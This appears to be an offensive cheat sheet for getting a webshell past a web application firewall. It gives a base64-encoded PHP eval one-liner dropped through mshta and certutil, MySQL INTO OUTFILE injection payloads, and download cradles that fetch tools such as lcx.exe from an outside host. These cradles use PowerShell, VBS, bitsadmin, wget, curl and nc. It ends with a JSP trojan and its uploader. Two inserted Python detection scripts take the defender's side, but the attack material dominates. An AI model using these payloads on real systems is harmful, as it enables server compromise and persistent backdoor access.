bypass-waf-put-Webshell

Whatever does not destroy me makes me stronger.

Using common system tools to encode and decode data so that certain protection software is bypassed and a webshell can be written.

0x01 Encoding bypass

```
# mshta vbscript:createobject("scripting.filesystemobject").createtextfile("yijuhua.txt",2,ture).writeline("PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+Cg==")(window.close)
# certutil -decode yijuhua.txt shell.txt
# type shell.txt
# echo 48 65 6C 6C 6F 2C 57 6F 72 6C 64 21 >hex.txt
> writes hex.txt; the hex bytes spell "Hello World!"
# certutil -decodehex hex.txt bin.txt
> hex decode
# certutil -encode bin.txt Encode.txt
> base64 encode
# certutil -decode Encode.txt Decode.txt
> base64 decode
```

0x02 Converting a command into a PowerShell-compatible encoded string

```
# command
echo "iex(command)" | iconv --to-code UTF-16LE | base64 -w 0
# PowerShell one-line download, variant 1
powershell $client = new-object System.Net.WebClient;$client.DownloadFile('https://baidu.com','file.name')
# PowerShell one-line download, variant 2
Invoke-WebRequest -uri 'https://baidu.com' -OutFile 'file.name'
# sometimes this has to be written out as a batch file
echo powershell $client = new-object System.Net.WebClient;$client.DownloadFile('https://baidu.com','file.name') > 1.bat
# watch the escaping of special characters in different environments
# Python
from base64 import b64encode
b64encode('iex(command)'.encode('UTF-16LE'))
# Ruby (encode transcodes to UTF-16LE; force_encoding would only relabel the UTF-8 bytes)
require "base64"
Base64.encode64('iex(command)'.encode('UTF-16LE'))
```
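As an added, defender-side example that is not part of the original post: the UTF-16LE/base64 transformation above is reversible, which is exactly what makes encoded PowerShell commands, certutil encode/decode calls and inline mshta scripts recognisable in process-creation telemetry. The Python below (the log format, host name, pids, user names and the URL are all constructed for illustration) decodes `-EncodedCommand` arguments, flags certutil encoding switches and `mshta vbscript:` invocations, and decodes base64 literals embedded in a command line, such as the one in section 0x01, to see whether they contain script source.

```python
import base64
import re
from typing import Dict, List

# Indicator strings taken from the commands shown in this post; extend for production use.
CERTUTIL_SWITCHES = ("-decode", "-decodehex", "-encode", "-urlcache")
CRADLE_KEYWORDS = ("downloadfile", "downloadstring", "invoke-webrequest",
                   "invoke-expression", "iex(")
PAYLOAD_MARKERS = ("<?php", "eval(", "<%")

B64_TOKEN_RE = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
PS_ENCODED_RE = re.compile(r"-(?:e|ec|enc|encoded|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# Assumed (constructed) log format: "<ts> <host> pid=<n> user=<u> cmd=<command line>"
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<host>\S+)\s+pid=(?P<pid>\d+)\s+user=(?P<user>\S+)\s+cmd=(?P<cmd>.*)$")


def encode_powershell(script: str) -> str:
    """Same transformation as the iconv | base64 pipeline above: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell(blob: str) -> str:
    """Reverse of encode_powershell: what an analyst does with a -EncodedCommand argument."""
    return base64.b64decode(blob).decode("utf-16-le")


def _is_text(s: str) -> bool:
    return all(ch.isprintable() or ch in "\r\n\t" for ch in s)


def decode_embedded_base64(text: str) -> List[str]:
    """Return every base64-looking token in text that decodes to readable text."""
    decoded = []
    for tok in B64_TOKEN_RE.findall(text):
        try:
            s = base64.b64decode(tok, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if _is_text(s):
            decoded.append(s)
    return decoded


def analyze(cmd: str) -> List[str]:
    """Return human-readable findings for one process command line (empty list = nothing seen)."""
    findings: List[str] = []
    low = cmd.lower()
    parts = low.split()
    exe = parts[0].rsplit("\\", 1)[-1] if parts else ""
    if exe.startswith("certutil") and any(sw in parts for sw in CERTUTIL_SWITCHES):
        findings.append("certutil used for encoding/decoding or download")
    if exe.startswith("mshta") and ("vbscript:" in low or "javascript:" in low):
        findings.append("mshta executing inline script")
    enc = PS_ENCODED_RE.search(cmd)
    if exe.startswith("powershell") and enc:
        findings.append("powershell encoded command")
        try:
            script = decode_powershell(enc.group(1))
        except (ValueError, UnicodeDecodeError):
            script = ""
        if any(k in script.lower() for k in CRADLE_KEYWORDS):
            findings.append("decoded script contains download/execute cradle")
    for s in decode_embedded_base64(cmd):
        if any(mk in s.lower() for mk in PAYLOAD_MARKERS):
            findings.append("base64 literal decodes to script source")
    return findings


def scan_logs(lines: List[str]) -> Dict[str, List[str]]:
    """Map pid -> findings for each log line whose command line raised at least one finding."""
    hits: Dict[str, List[str]] = {}
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            found = analyze(m.group("cmd"))
            if found:
                hits[m.group("pid")] = found
    return hits


# Constructed sample log lines (not real telemetry); the URL is a placeholder.
SAMPLE_SCRIPT = "$c=New-Object System.Net.WebClient;$c.DownloadFile('http://example.invalid/a.txt','a.txt')"
SAMPLE_LOGS = [
    '2018-09-20T14:09:01Z web01 pid=4120 user=IIS_IUSR cmd=mshta vbscript:createobject("scripting.filesystemobject")'
    '.createtextfile("yijuhua.txt",2,true).writeline("PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+Cg==")(window.close)',
    "2018-09-20T14:09:05Z web01 pid=4133 user=IIS_IUSR cmd=certutil -decode yijuhua.txt shell.txt",
    "2018-09-20T14:10:12Z web01 pid=4170 user=IIS_IUSR cmd=powershell -EncodedCommand " + encode_powershell(SAMPLE_SCRIPT),
    "2018-09-20T14:11:00Z web01 pid=4201 user=admin cmd=certutil -verify cert.cer",
    "2018-09-20T14:12:30Z web01 pid=4210 user=admin cmd=notepad.exe readme.txt",
]

if __name__ == "__main__":
    for pid, found in scan_logs(SAMPLE_LOGS).items():
        print(pid, "->", "; ".join(found))
```

The certutil rule deliberately keys on the encode/decode switches rather than on the binary name alone, so the `certutil -verify` line in the sample produces no finding; a plain "certutil ran" rule would be far noisier on real hosts.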


```
echo '<?php @eval($_POST[cmd]);?>' | base64
echo PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+Cg== | base64 -D | tee yijuhua.txt
cat yijuhua.txt
```


0x03 MySQL

Preconditions:
root privileges
GPC off (single quotes can be used)
absolute path known (not needed for reading a file, required for writing one)
--secure-file-priv not configured

```
1. union
id=1 union select 1,2,3,4,5,6,7,'<? phpinfo(); ?>' into outfile 'C:\\phpinfo.php'%23
2. no union
id=1 into outfile 'C:\\yijuhua.php' fields terminated by '<? phpinfo(); ?>'%23
```
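As an added example that is not part of the original post, from the defender's side: the preconditions listed above for `INTO OUTFILE` can be audited on the MySQL server itself. The Python below (the `SHOW VARIABLES`, `SHOW GRANTS` and general-log samples are constructed, and the web-root list is an assumption) parses `secure_file_priv`, checks whether an account holds the global FILE privilege, and flags `INTO OUTFILE` / `INTO DUMPFILE` statements, rating those whose target path falls under a web root as high severity.

```python
import re
from typing import Dict, List, Tuple

OUTFILE_RE = re.compile(r"\bINTO\s+(?:OUTFILE|DUMPFILE)\s+'([^']*)'", re.I)
GRANT_RE = re.compile(r"^GRANT\s+(.*?)\s+ON\s+\*\.\*", re.I)


def parse_show_variables(text: str) -> Dict[str, str]:
    """Parse tab-separated 'Variable_name<TAB>Value' rows as printed by mysql -B."""
    variables: Dict[str, str] = {}
    for line in text.splitlines():
        if "\t" not in line or line.startswith("Variable_name"):
            continue
        name, value = line.split("\t", 1)
        variables[name.strip()] = value.strip()
    return variables


def secure_file_priv_status(value: str) -> Tuple[str, str]:
    """Rate the secure_file_priv setting: empty = unrestricted, NULL = disabled, path = confined."""
    if value == "":
        return "HIGH", "secure_file_priv is empty: INTO OUTFILE can write anywhere the server user can reach"
    if value.upper() == "NULL":
        return "OK", "secure_file_priv is NULL: file import/export is disabled"
    return "MEDIUM", f"secure_file_priv confines file writes to {value}"


def has_file_privilege(grants: List[str]) -> bool:
    """FILE is a global privilege, so it only appears (explicitly or via ALL) in an ON *.* grant."""
    for grant in grants:
        m = GRANT_RE.match(grant.strip())
        if not m:
            continue
        privs = m.group(1).upper()
        if "ALL PRIVILEGES" in privs or re.search(r"\bFILE\b", privs):
            return True
    return False


def _normalize(path: str) -> str:
    return path.replace("\\", "/").rstrip("/").lower()


def file_write_queries(log_lines: List[str], web_roots: List[str]) -> List[Dict[str, str]]:
    """Flag INTO OUTFILE / DUMPFILE statements; targets under a web root are rated HIGH."""
    roots = [_normalize(r) + "/" for r in web_roots]
    hits: List[Dict[str, str]] = []
    for line in log_lines:
        m = OUTFILE_RE.search(line)
        if not m:
            continue
        path = m.group(1).replace("\\\\", "\\")  # undo SQL string escaping of backslashes
        under_root = any(_normalize(path).startswith(r) for r in roots)
        hits.append({"query": line.strip(), "path": path,
                     "severity": "HIGH" if under_root else "MEDIUM"})
    return hits


# Constructed sample outputs (not from a real server); web roots are an assumption.
SAMPLE_VARIABLES = "Variable_name\tValue\nsecure_file_priv\t\nversion\t5.7.23\n"
SAMPLE_GRANTS_ROOT = ["GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION"]
SAMPLE_GRANTS_APP = ["GRANT USAGE ON *.* TO 'app'@'localhost'",
                     "GRANT SELECT, INSERT, UPDATE ON `shop`.* TO 'app'@'localhost'"]
WEB_ROOTS = [r"C:\inetpub\wwwroot", "/var/www/html"]
SAMPLE_QUERY_LOG = [
    r"2018-09-20T14:09:01 12 Query SELECT 1,2,3,4,5,6,7,'<? phpinfo(); ?>' INTO OUTFILE 'C:\\inetpub\\wwwroot\\phpinfo.php'",
    "2018-09-20T14:09:30 13 Query SELECT * FROM orders INTO OUTFILE '/tmp/orders.csv'",
    "2018-09-20T14:10:02 14 Query SELECT id, name FROM products WHERE id = 1",
]

if __name__ == "__main__":
    level, msg = secure_file_priv_status(parse_show_variables(SAMPLE_VARIABLES).get("secure_file_priv", "NULL"))
    print(level, msg)
    print("root holds FILE:", has_file_privilege(SAMPLE_GRANTS_ROOT))
    for hit in file_write_queries(SAMPLE_QUERY_LOG, WEB_ROOTS):
        print(hit["severity"], hit["path"])
```

Setting `secure_file_priv` to `NULL` (or to a directory outside every web root) and withholding the FILE privilege from application accounts removes two of the four preconditions at once, independently of how the web tier handles quotes or path disclosure.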


0x04 Command execution available (echo)

When the physical web path needed to write the webshell is unknown, it can be obtained by searching for a file: right-click, view the page source, and pick any .js file referenced there.

```
dir /s/b <drive letter>:\example.js
```
This returns the absolute path.

0x05

```
trebuchet.exe c:\1.txt c:\2.txt
```

lpk.dll hijacking, MySQL UDF import

0x06 VBS script upload 2

```
echo Set Post = CreateObject("Msxml2.XMLHTTP") >>1.vbs
echo Set Shell = CreateObject("Wscript.Shell") >>1.vbs
echo Post.Open "GET","http://baidu.com",0 >>1.vbs
echo Post.Send() >>1.vbs
echo Set aGet = CreateObject("ADODB.Stream") >>1.vbs
echo aGet.Mode = 3 >>1.vbs
echo aGet.Type = 1 >>1.vbs
echo aGet.Open() >>1.vbs
echo aGet.Write(Post.responseBody) >>1.vbs
echo aGet.SaveToFile "1.html",2 >>1.vbs
start 1.vbs
```

0x07 Linux

```
wget https://04z.net -O 1.html
curl -o 1.html https://04z.net
python -c "import urllib;urllib.urlretrieve('https://04z.net', '1.txt')"
ruby -e "require 'open-uri';File.open('1.txt', 'wb') {|f| f.write(open('https://04z.net') {|f1| f1.read})}"
perl -e "use LWP::Simple;getstore('http://baidu.com', '1.txt');"
# this only handles http; for https you need LWP::UserAgent
# nc
[server] nc -l 5678 > 1.tar
[client] nc server_ip 5678 < 1.tar
```

0x08 Struts upload exp [win]

Remote download from cmd

```
bitsadmin /transfer ChromeDownloadjob /download /priority normal http://04z.net/ngrok.sh %UserProfile%\Desktop\ngrok.sh
```

VBS download

```
Download "http://04z.net/lcx.exe", "lcx.exe"
Function Download(strUrl, strFile)
Set xHttp = CreateObject("MSXML2.ServerXMLHTTP")
xHttp.Open "GET", strUrl,0
xHttp.Send()
Set bStrm= CreateObject("ADODB.Stream")
with bStrm
.type = 1 '//binary
.open
.write xHttp.responseBody
.savetofile strFile, 2 '//overwrite
end with
End Function
```

JSP trojan connector

```
<html>
<head>
<title>JSP一句话木马客户端</title>
</head>
<body>
<div align=center>
<br><br>
<font color=red>专用JSP木马连接器</font>
<br><br>
<form name=get method=post>服务端地址<input name=url size=110 type=text>
<br><br>
<textarea name=t rows=30 cols=120>你提交的代码</textarea>
<br>保存成的文件名:<input name=f size=30 value=shell.jsp><input type=button onclick="javascript:get.action=document.get.url.value;get.submit()" value=提交> </form>
<br>服务端代码:<br>
<textarea rows=5 cols=120><%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%></textarea>
</div>
</body>
</html>
```

This article is original; when reposting, please comply with this site's license.

Updated: September 20, 2018, 14:09